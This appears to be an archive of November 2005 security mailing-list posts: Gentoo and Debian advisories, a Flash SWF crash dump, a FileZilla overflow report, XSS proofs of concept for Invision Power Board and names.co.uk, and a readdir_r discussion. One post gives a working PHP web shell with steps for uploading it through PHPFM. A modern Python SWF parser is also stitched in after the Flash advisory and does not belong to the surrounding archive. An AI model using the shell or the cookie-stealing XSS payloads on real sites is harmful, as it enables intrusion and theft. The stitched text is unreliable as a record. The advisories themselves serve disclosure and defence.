EUSecWest/London Call for Papers and PacSec/Tokyo announcements
url: http://eusecwest.com
url: http://pacsec.jp (PacSec/Tokyo Announcement below...)

EUSecWest/core06 CALL FOR PAPERS
London Security Summit, February 20/21 2006

LONDON, United Kingdom -- Applied technical security will be the focus of a new annual conference from the organizers of CanSecWest and PacSec, sponsored by the U.K. government's CESG, where eminent figures in the international security industry will get together with leading European researchers to share best practices and technology. The most significant new discoveries about computer network attacks and defenses, commercial security solutions, and pragmatic real-world security experience will be presented in central London at the Victoria Park Plaza hotel on February 20 and 21.

The EUSecWest meeting provides international researchers a relaxed, comfortable environment to learn from informative tutorials on key developments in security technology, and to collaborate and socialize with their peers in one of the world's hubs of IT activity - downtown London.

In addition to the usual one-hour tutorials, panel sessions and highly entertaining 5-minute lightning talks, this conference will also feature a new session called Elevator Focus Groups. Featuring several short sessions, these commercial presentations will showcase new, significantly used, or dramatically innovative products in the information security realm. Each selected vendor will have a short 10-minute presentation (the elevator pitch), followed by 10 minutes of audience Q&A and interactive discussion amongst the expert security practitioners attending. In this session both the audience and the vendors can get valuable feedback from world-leading experts. The attendees can get user evaluations and learn from sharing experiences about real-world security applications and the practical uses of the products - the focus group. Hence the name: Elevator Focus Groups.

The EUSecWest conference will also feature the availability of the Security Masters Dojo expert network security sensei instructors, and their advanced and intermediate hands-on training courses - featuring small class sizes and practical application exercises to maximize information transfer.

We would like to announce the opportunity to submit papers, lightning talk proposals, and Elevator Focus candidate products for selection by the EUSecWest technical review committee. Please make your proposal submissions before December 1st 2005. Slides for the papers must be submitted by February 1st 2006. Some invited papers have been confirmed, but a limited number of speaking slots are still available. The conference is responsible for travel and accommodations for the speakers. If you have a proposal for a tutorial session then please email a synopsis of the material and your biography, papers and speaking background to [EMAIL PROTECTED]. Only slides will be needed for the February paper deadline; full text does not have to be submitted.

The EUSecWest/core06 conference consists of tutorials on technical details about current issues, innovative techniques and best practices in the information security realm. The audiences are a multi-national mix of professionals involved on a daily basis with security work: security product vendors, programmers, security officers, and network administrators. We give preference to technical details and new education for a technical audience. The conference itself is a single-track series of presentations in a lecture theater environment. The presentations offer speakers the opportunity to showcase on-going research and collaborate with peers while educating and highlighting advancements in security products and techniques. The focus is on innovation, tutorials, and education instead of product pitches. Some commercial content is tolerated, but it needs to be backed up by a technical presenter - either giving a valuable tutorial and best practices instruction or detailing significant new technology in the products.

Paper proposals should consist of the following information:

1) Presenter, geographical location (country of origin/passport) and contact info (e-mail, postal address, phone, fax).
2) Employer and/or affiliations.
3) Brief biography, list of publications and papers.
4) Any significant presentation and educational experience/background.
5) Topic synopsis, proposed paper title, and a one-paragraph description.
6) Reason why this material is innovative or significant or an important tutorial.
7) Optionally, any samples of prepared material or outlines ready.

Please include the plain text version of this information in your email as well as any file, pdf, or html attachments. Please forward the above information to [EMAIL PROTECTED] to be considered for placement on the speaker roster, have your lightning talk scheduled, or submit your product for inclusion in the focus
[ GLSA 200511-04 ] ClamAV: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                 Gentoo Linux Security Advisory           GLSA 200511-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: ClamAV: Multiple vulnerabilities
      Date: November 06, 2005
      Bugs: #109213
        ID: 200511-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

ClamAV has several security flaws which make it vulnerable to remote execution of arbitrary code and a Denial of Service.

Background
==========

ClamAV is a GPL anti-virus toolkit, designed for integration with mail servers to perform attachment scanning. ClamAV also provides a command line scanner and a tool for fetching updates of the virus database.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  app-antivirus/clamav         < 0.87.1                  >= 0.87.1

Description
===========

ClamAV has multiple security flaws: a boundary check was performed incorrectly in petite.c, a buffer size calculation in unfsg_133 was incorrect in fsg.c, a possible infinite loop was fixed in tnef.c, and a possible infinite loop in cabd_find was fixed in cabd.c. In addition, Marcin Owsiany reported that a corrupted DOC file causes a segmentation fault in ClamAV.

Impact
======

By sending a malicious attachment to a mail server that is hooked into ClamAV, a remote attacker could cause a Denial of Service or the execution of arbitrary code.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All ClamAV users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.87.1"

References
==========

  [ 1 ] CAN-2005-3239
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3239
  [ 2 ] CAN-2005-3303
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3303
  [ 3 ] ClamAV release notes
        http://sourceforge.net/project/shownotes.php?release_id=368319
  [ 4 ] Zero Day Initiative advisory
        http://www.zerodayinitiative.com/advisories/ZDI-05-002.html

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200511-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

pgpDoG7KccR8S.pgp
Description: PGP signature
[ GLSA 200511-05 ] GNUMP3d: Directory traversal and XSS vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                 Gentoo Linux Security Advisory           GLSA 200511-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: GNUMP3d: Directory traversal and XSS vulnerabilities
      Date: November 06, 2005
      Bugs: #109667
        ID: 200511-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

GNUMP3d is vulnerable to directory traversal and cross-site scripting attacks that may result in information disclosure or the compromise of a browser.

Background
==========

GNUMP3d is a streaming server for MP3s, OGG vorbis files, movies and other media formats.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  media-sound/gnump3d          < 2.9.7                   >= 2.9.7

Description
===========

Steve Kemp reported two cross-site scripting vulnerabilities related to the handling of files (CVE-2005-3424, CVE-2005-3425). Also reported is a directory traversal vulnerability which stems from the attempt to sanitize input paths (CVE-2005-3123).

Impact
======

A remote attacker could exploit this to disclose sensitive information or inject and execute malicious script code, potentially compromising the victim's browser.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All GNUMP3d users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-sound/gnump3d-2.9.7"

References
==========

  [ 1 ] CVE-2005-3123
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3123
  [ 2 ] CVE-2005-3424
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3424
  [ 3 ] CVE-2005-3425
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3425

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200511-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

pgpTgdh7vgPpV.pgp
Description: PGP signature
[SECURITY] [DSA 886-1] New chmlib packages fix several vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 886-1                       [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
November 7th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : chmlib
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no
CVE IDs        : CVE-2005-2659 CVE-2005-2930 CVE-2005-3318
BugTraq ID     : 15211

Several vulnerabilities have been discovered in chmlib, a library for dealing with CHM format files. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2005-2659
    Palasik Sandor discovered a buffer overflow in the LZX decompression method.

CVE-2005-2930
    A buffer overflow has been discovered that could lead to the execution of arbitrary code.

CVE-2005-3318
    Sven Tantau discovered a buffer overflow that could lead to the execution of arbitrary code.

The old stable distribution (woody) does not contain chmlib packages.

For the stable distribution (sarge) these problems have been fixed in version 0.35-6sarge1.

For the unstable distribution (sid) these problems have been fixed in version 0.37-2.

We recommend that you upgrade your chmlib packages.

Upgrade Instructions
- --------------------

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1.dsc
    Size/MD5 checksum:      604 022d55ea43ef4a54648b0823163c4a07
  http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1.diff.gz
    Size/MD5 checksum:    15698 55eeab9a32a66c5e123ab51f3d7427df
  http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35.orig.tar.gz
    Size/MD5 checksum:   368428 8fa0e692b2606a03fb51589f66a82eec

Alpha architecture:

  http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_alpha.deb
    Size/MD5 checksum:    25688 2471920dc5214b95a44e50e2a8800ada
  http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_alpha.deb
    Size/MD5 checksum:    18576 0b1d802a79cea68c00d36cd9cb7a36cd
  http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_alpha.deb
    Size/MD5 checksum:    25544 23306cc3f7b0772f744707c86fa9258a

AMD64 architecture:

  http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_amd64.deb
    Size/MD5 checksum:    23748 e5a72c3311e7b00d6295a75f7bb37560
  http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_amd64.deb
    Size/MD5 checksum:    16928 8a2d68579e364a284c03dcc4b9a01e37
  http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_amd64.deb
    Size/MD5 checksum:    22564 50d2a8d694d1bf7251d18b4f7b02ede7

ARM architecture:

  http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_arm.deb
    Size/MD5 checksum:    25242 ec14b38be010c3f1fee93dd618124c5e
  http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_arm.deb
    Size/MD5 checksum:    15962 5e1ec37635078cc29b9f2a4f91f9b20e
  http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_arm.deb
    Size/MD5 checksum:    24000 bc84ed2d77918f6eb4378f35f43cd4e5

Intel IA-32 architecture:

  http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_i386.deb
    Size/MD5 checksum:    24872 fbea0ba2924295a9f553c346eeb164af
  http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_i386.deb
    Size/MD5 checksum:    16094 de94d72e5414d1b218fd32f11cd7351b
  http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_i386.deb
    Size/MD5 checksum:    22872 3e37bda96c284423f467aecb88e8dc98

Intel IA-64 architecture:

  http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_ia64.deb
    Size/MD5 checksum:    28504 ef19dde34158fa817781c685d2499cbb
  http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_ia64.deb
    Size/MD5 checksum:    19348 e15dc8288ba0a0bee7a9490c4fe653de
  http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_ia64.deb
    Size/MD5 checksum:    27268 497388fcd7e08a7558dde96082b2707a

HP Precision architecture:
Work in Progress: FileZilla Server Terminal V0.9.4d Buffer Overflow
** Inge Henriksen Security Advisory **
[EMAIL PROTECTED]

I have discovered a buffer overflow in FileZilla Server Terminal 0.9.4d. The exploit is still to be considered a work in progress, as it is still not clear to me why the exploit works on some systems and not others. Please let me know if you manage to reproduce the exploit and perhaps we can figure out the differences.

Stable Exploit Test System
Microsoft Windows XP Professional Service Pack 2 (Build 2600)

Technical Description
The FileZilla Server has a user interface that is used to configure and monitor the FileZilla Server. By sending a long USER ftp command to the FileZilla Server, a successful attack may crash the FileZilla Server Terminal process. Note that the FileZilla Server itself does not crash.

Proof of Concept
The exploit is somewhat difficult to exploit. On the stable exploit test system I have understood that the following steps will crash the FileZilla Server Terminal process:

1. Start the FileZilla Server.
2. Start the FileZilla Server Terminal and log in to the FileZilla Server started in step 1.
3. Send the following USER commands: USER A, USER AA, USER AAA etc., incrementing by one letter (A) in the command.

The FileZilla Server Terminal usually crashes after about 900-3000 A's.

The rpt file says the following:

System details:
---
Operating System: Microsoft Windows XP Professional Service Pack 2 (Build 2600)
Processor Information: Vendor: GenuineIntel, Speed: 1728MHz, Type: Intel Pentium compatible, Number Of Processors: 1, Architecture: Intel, Level: Pentium II/Pro, Stepping: 33-36
Memory Information: Memory Used 69%, Total Physical Memory 769328KB, Physical Memory Available 233460KB, Total Virtual Memory 2097024KB, Available Virtual Memory 2061140KB, Working Set Min: 200KB Max: 1380KB.

Exception Details:
--
Exception code: C005 ACCESS_VIOLATION
Fault address: 7C910F29 01:FF29 C:\WINDOWS\system32\ntdll.dll

Call stack:
---
Address   Frame     Function       SourceFile
7C910F29  0012FA9C  0001:FF29      C:\WINDOWS\system32\ntdll.dll
7C910D5C  0012FB70  0001:FD5C      C:\WINDOWS\system32\ntdll.dll
00438A1A  0012FBAC  0001:00037A1A  C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe
00405049  0012FBD4  0001:4049      C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe
0040562C  0012FC00  0001:462C      C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe
77D38734  0012FC2C  0001:7734      C:\WINDOWS\system32\USER32.dll
77D38816  0012FC94  0001:7816      C:\WINDOWS\system32\USER32.dll
77D3C63F  0012FCC4  0001:B63F      C:\WINDOWS\system32\USER32.dll
77D3E905  0012FCE4  0001:D905      C:\WINDOWS\system32\USER32.dll
0045F924  0012FD58  0001:0005E924  C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe
77D38734  0012FD84  0001:7734      C:\WINDOWS\system32\USER32.dll
77D38816  0012FDEC  0001:7816      C:\WINDOWS\system32\USER32.dll
77D389CD  0012FE4C  0001:79CD      C:\WINDOWS\system32\USER32.dll
77D396C7  0012FE5C  0001:86C7      C:\WINDOWS\system32\USER32.dll
SEC Consult SA-20051107-1 :: Macromedia Flash Player ActionDefineFunction Memory Corruption
SEC-CONSULT Security Advisory 20051107-1
===========================================
title:              Macromedia Flash Player ActionDefineFunction Memory Corruption
program:            Macromedia Flash Plugin
vulnerable version: flash.ocx v7.0.19.0 and earlier
                    libflashplayer.so before 7.0.25.0
homepage:           www.macromedia.com
found:              2005-06-27
by:                 Bernhard Mueller / SEC-CONSULT / www.sec-consult.com
===========================================

Vendor description:
---
Macromedia Flash Player is the high performance, lightweight, highly expressive client runtime that delivers powerful and consistent user experiences across major operating systems, browsers, mobile phones and devices.

Vulnerability:
---
ActionScript is an ECMAScript-based programming language used for controlling Macromedia Flash movies and applications. In SWF files, ActionScript commands are represented by DoAction tags embedded in frames. SEC Consult has found that parameters to ActionDefineFunction (ACTIONRECORD 0x9b) are not properly sanitized. Loading a specially crafted SWF leads to an improper memory access condition which can be used to crash Flash Player or may be exploited as a vector for code execution.

This issue is similar to CAN-2005-2628 (as reported by eEye Digital Security on November 4, 2005) but affects a different function. Coincidentally, Macromedia received our notification of this bug on the same day (June 27).

Proof of Concept:
---
A malicious flash movie dump:

swf
  [SetBackgroundColor] TagID: 9 (size: 3, short tag)
    dump: \x43\x02\xff\x00\x00
  [DoAction] TagID: 12 (size: 60, short tag)
    dump: \x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00
          \x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43
          \x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45
          \x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00
  [ShowFrame] TagID: 1 (size: 0, short tag)
    dump: \x40\x00
  [End] TagID: 0 (size: 0, short tag)
    dump: \x00\x00
/swf

Recommended Fix:
---
The issue has been addressed in MPSB05-07. Upgrade to the newest version of Flash Player 7 or to Flash Player 8.
Link: http://www.macromedia.com/devnet/security/security_zone/mpsb05-07.html

Vendor status:
---
vendor notified: 2005-06
fixed: 2005-09

General remarks
---
We would like to apologize in advance for potential nonconformities and/or known issues.

~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Blindengasse 3
A-1080 Wien
Austria
Tel.: +43 / 1 / 409 0307 - 570
Fax.: +43 / 1 / 409 0307 - 590
Mail: office at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2005
bmu at sec-consult dot com
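The tag dump above can be checked mechanically. The Python below is an added example, not SEC Consult's or Macromedia's code: it decodes the SWF RECORDHEADER (a UI16 whose upper 10 bits are the tag code and lower 6 bits the length) and the DoAction action records (action codes at or above 0x80 carry a UI16 length; ActionDefineFunction 0x9b is a NUL-terminated FunctionName, a UI16 NumParams, that many NUL-terminated strings and a UI16 CodeSize). It parses the advisory's bytes twice, once bounding every field by the record's declared length and once bounding them only by the end of the tag while believing NumParams, and reports why each mode rejects the record. The lenient mode is an illustration of the trust problem the advisory describes, not a reconstruction of Flash Player's parser; the second constant is a constructed well-formed record for comparison.

```python
import struct

TAG_DO_ACTION = 12
ACTION_DEFINE_FUNCTION = 0x9B
ACTION_END = 0x00

# The DoAction tag from the dump above, re-typed byte for byte (constructed from the
# advisory text, not read from a real SWF file).
DOACTION_TAG = bytes.fromhex(
    "3c03" "9b0800"                      # RECORDHEADER code 12 length 60; 0x9b with declared length 8
    + "41" * 8 + "00" + "4000"           # FunctionName "AAAAAAAA" (9 bytes, already > 8); NumParams 64
    + "42" * 8 + "00" + "43" * 8 + "00" + "44" * 8 + "00"
    + "45" * 8 + "00" + "46" * 8 + "00"  # only five parameter strings are present
    + "00"                               # ActionEnd
)
# A well-formed record for comparison (constructed): name "f", params "a" and "b",
# CodeSize 1, one byte of function body (0x17, ActionPop), then ActionEnd.
WELLFORMED_BODY = b"\x9b\x0a\x00" b"f\x00" b"\x02\x00" b"a\x00b\x00" b"\x01\x00" b"\x17" b"\x00"

class SwfParseError(ValueError):
    """A field would be read past the bound it is supposed to respect."""

def parse_record_header(data, off=0):
    """RECORDHEADER: UI16, tag code in the upper 10 bits, length in the lower 6. Returns (code, length, body_off)."""
    if off + 2 > len(data):
        raise SwfParseError("truncated RECORDHEADER")
    (v,) = struct.unpack_from("<H", data, off)
    code, length, off = v >> 6, v & 0x3F, off + 2
    if length == 0x3F:                   # 0x3F announces a UI32 long-form length
        raise SwfParseError("long-form tag length not handled in this example")
    if off + length > len(data):
        raise SwfParseError("tag length %d runs past the end of the data" % length)
    return code, length, off

def read_string(data, off, limit):
    """NUL-terminated STRING whose terminator must lie before `limit`."""
    nul = data.find(b"\x00", off, limit)
    if nul < 0:
        raise SwfParseError("unterminated STRING at offset %d (limit %d)" % (off, limit))
    return data[off:nul].decode("latin-1"), nul + 1

def read_u16(data, off, limit):
    if off + 2 > limit:
        raise SwfParseError("UI16 at offset %d runs past limit %d" % (off, limit))
    return struct.unpack_from("<H", data, off)[0], off + 2

def parse_doaction(body, strict=True):
    """Walk the action records of a DoAction tag body and return them as dicts.
    strict=True bounds every ActionDefineFunction field by the record's declared length, as a
    hardened parser must. strict=False bounds them only by the end of the tag and believes
    NumParams: the kind of trust the advisory describes (an illustration, not Flash Player's code)."""
    records, off = [], 0
    while off < len(body):
        code, off = body[off], off + 1
        if code == ACTION_END:
            break
        if code < 0x80:                  # short actions carry no length field
            records.append({"code": code, "length": 0})
            continue
        length, off = read_u16(body, off, len(body))
        rec_end = off + length
        if rec_end > len(body):
            raise SwfParseError("record 0x%02x declares %d bytes past the end of the tag" % (code, length))
        if code != ACTION_DEFINE_FUNCTION:
            records.append({"code": code, "length": length})
            off = rec_end
            continue
        limit = rec_end if strict else len(body)
        name, off = read_string(body, off, limit)
        num_params, off = read_u16(body, off, limit)
        params = []
        for i in range(num_params):
            if off >= limit:
                raise SwfParseError("NumParams=%d but only %d parameter strings fit" % (num_params, i))
            param, off = read_string(body, off, limit)
            params.append(param)
        code_size, off = read_u16(body, off, limit)
        if strict and off != rec_end:
            raise SwfParseError("record declares %d bytes but its fields end at offset %d" % (length, off))
        if off + code_size > len(body):
            raise SwfParseError("CodeSize=%d runs past the end of the tag" % code_size)
        records.append({"code": code, "name": name, "num_params": num_params, "params": params, "code_size": code_size})
        off += code_size                 # the function's own actions follow the record
    return records

def describe(tag):
    """Parse one DoAction tag both ways; per mode, the records or the rejection reason."""
    code, length, body_off = parse_record_header(tag)
    if code != TAG_DO_ACTION:
        raise SwfParseError("not a DoAction tag (code %d)" % code)
    body = tag[body_off:body_off + length]
    out = {}
    for mode in ("strict", "lenient"):
        try:
            out[mode] = parse_doaction(body, strict=(mode == "strict"))
        except SwfParseError as e:
            out[mode] = "rejected: %s" % e
    return out
```

`describe(DOACTION_TAG)` shows the two independent inconsistencies in the advisory's record: the declared length of 8 does not even cover the 9-byte function name, and NumParams claims 64 strings where the tag holds five (the lenient walk eats the trailing ActionEnd byte as an empty sixth parameter before running out of data). A parser that checks either bound rejects the record; one that trusts the fields reads past the buffer.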
[SECURITY] [DSA 884-1] New Horde3 packages fix insecure default installation
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 884-1                       [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
November 7th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : horde3
Vulnerability  : design error
Problem type   : remote
Debian-specific: yes
CVE ID         : CVE-2005-3344
Debian Bugs    : 332290 332289

Mike O'Connor discovered that the default installation of Horde3 on Debian includes an administrator account without a password. Already configured installations will not be altered by this update.

The old stable distribution (woody) does not contain horde3 packages.

For the stable distribution (sarge) this problem has been fixed in version 3.0.4-4sarge1.

For the unstable distribution (sid) this problem has been fixed in version 3.0.5-2.

We recommend that you verify your horde3 admin account if you have installed Horde3.

Upgrade Instructions
- --------------------

wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
    will update the internal database
apt-get upgrade
    will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge1.dsc
    Size/MD5 checksum:      627 cc9b46f4b5a4f4a514ecbc51d9eb3a58
  http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge1.diff.gz
    Size/MD5 checksum:     6751 b0e7fb95efe86aeb42cfd0b478dd312b
  http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4.orig.tar.gz
    Size/MD5 checksum:  3378143 e2221d409ba1c8841ce4ecee981d7b61

Architecture independent components:

  http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge1_all.deb
    Size/MD5 checksum:  3432038 671d10d028345c0cfc133cc0504a2d50

These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFDbxYnW5ql+IAeqTIRAp50AKCu2u8rU/MHoFT+vgl7mRFrEGp8kACgtEBh
NQhwCmoAsCjYCSlFbpsYcrU=
=uGyV
-----END PGP SIGNATURE-----
XSS vulnerability in names.co.uk framed hosting
names.co.uk is an English registrar and web hosting company. Their frames-based hosting option has an XSS vulnerability allowing injection of arbitrary Javascript. For example: http://www.weddingbiz.co.uk/%22%3E%3Cframe%20src%3D%22javascript%3Aalert%281%29%22%20 According to webhosting.info, names.co.uk hosts 75k domains. If even a few percent are using the frames-based hosting option, then this vulnerability would affect thousands of sites. This vulnerability was reported twice to names.co.uk in early September 2005 (ticket SU197304). Their response was that it was not a security risk.
Re: [Full-disclosure] Re: readdir_r considered harmful
On 06 Nov 05, at 01:00, [EMAIL PROTECTED] wrote:

>> Then you never really understood the implementation, seems.
>>
>> Of course all implementations keep the content of the directory as read with getdents or so in the DIR descriptor. But it is usually not the case that the whole content fits into the buffer allocated. One could, of course, resize the buffer to fit the content of the directory read, even if this means reserving hundreds or thousands of kBs. But this is not how most implementations work.
>
> I don't see how that is relevant; the typical use of readdir() is as follows:
>
>     DIR *dirp = opendir(name);
>     while ((dent = readdir(dirp)) != NULL) {
>         ...
>     }
>     closedir(dirp);
>
> Nothing other threads do with readdir() on different dirp's will influence what dent points to. I have *never* seen a program where multiple threads read from a single dirp; and I can't imagine the use.

In practice, you're correct. In theory, however, consider the following code path:

    THREAD 1                         THREAD 2
    --------                         --------
    DIR *d1 = opendir(dir1);
                                     DIR *d2 = opendir(dir2);
    dent1 = readdir(d1);
                                     dent2 = readdir(d2);
    use(dent1);

In most implementations, dent1 != dent2. HOWEVER, there is no guarantee that they will not both point to the same statically allocated buffer, and some implementations may do so. For example, this is why ctime_r exists: ctime returns a pointer to a statically allocated buffer, and hence is not thread safe.

You are correct, though, that the glibc implementation of readdir is thread-safe, so readdir_r is unnecessary in all common situations.

PGP.sig
Description: This is a digitally signed message part
upload phpshell in PHPFM
upload phpshell in PHPFM
discovered by rUnViRuS
www.worlddefacers.net
www.security-arab.com
=-=-=-=-=-=-=-=-=
the shell code:
---
    <pre><?php passthru($_GET['cmd']); ?>
---
save as cmd.php, then upload it in PHPFM.
=-=-=-=
Used Shell
=-=-=-=
www.site.com/[file upload name]/[files]/cmd.php?cmd=[linux command]
=-=-=-==-=-=-==-=-=-==-=-=-==-=-=-==-=-=-=
Invision Power Board 2.1 : Multiple XSS Vulnerabilities
Fast translation of benji's advisory

***
Author  : benjilenoob
WebSite : http://benji.redkod.org/ and http://www.redkod.org/
Audit in pdf : http://benji.redkod.org/audits/ipb.2.1.pdf
Product : Invision Power Board
Version : 2.1
Risk    : Low. XSS

I- Non-critical XSS:

1. Input passed to the $address variable isn't properly verified in the administrative section. This can be exploited by providing a valid login and JavaScript code in the variable. The code will be executed in a user's browser session in the context of an affected site.
   PoC: http://localhost/2p1p0b3/upload/admin.php?adsess=[xss]&act=login&code=login-complete
   This could be exploited to steal cookie information.

2. Input passed to the ACP Notes textarea field in the administrative section isn't properly verified. This can be exploited to insert JavaScript code in the notes. The code will be executed in a user's browser session in the context of an affected site.
   PoC: </textarea>'/><script>alert(document.cookie)</script>

3. Input passed to the Member's Log In User Name, Member's Display Name, Email Address contains..., IP Address contains..., AIM name contains..., ICQ Number contains..., Yahoo! Identity contains..., Signature contains..., Less than n posts, Registered Between (MM-DD-), Last Post Between (MM-DD-) and Last Active Between (MM-DD-) member profile parameters in the administrative section isn't properly verified. This can be exploited to insert JavaScript code.

4. Non-permanent XSS:
   http://localhost/2p1p0b3/upload/admin.php?adsess=[id]&section=content&act=forum&code=new&name=[xss]

5. Non-permanent XSS after administrative login:
   http://localhost/2p1p0b3/upload/admin.php?name=[xss]&description=[xss]

6. Input passed to the description field of a Component in the Components section of the administrative section isn't properly verified. This can be exploited to insert JavaScript code.
   PoC: </textarea>'/><script>alert()</script>

7. Input passed to the Member Name, Password, Email Address fields of a new member's profile in the administrative section isn't properly verified. This can be exploited to insert JavaScript code.

8. Input passed to the Group Icon Image field of a new Group in the administrative section isn't properly verified. This can be exploited to insert JavaScript code.

9. Input passed to the Calendar: Title of a new Calendar in the administrative section isn't properly verified. This can be exploited to insert JavaScript code.

Benji
Team RedKod
http://www.redkod.org/
***

Regards,
/JA
http://www.securinfos.info

smime.p7s
Description: S/MIME Cryptographic Signature
Asterisk vmail.cgi vulnerability
Assurance.com.au - Vulnerability Advisory
---
Release Date: 07-Nov-2005
Software: Asterisk Web-VoiceMail (Comedian VoiceMail)
http://www.asterisk.org/

Asterisk is a complete PBX in software. It runs on Linux, BSD and MacOSX and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in many protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware.

Versions affected:
  Asterisk Versions <= 1.0.9
  Asterisk Beta Versions <= 1.2.0-beta1
  Asterisk @ Home Versions <= 1.5
  Asterisk @ Home Beta Versions <= 2.0 Beta 4

Vulnerability discovered:
A vulnerability in the voicemail retrieval system allows an authenticated user to download any .wav/.WAV file from the system, including other users' voicemail messages.
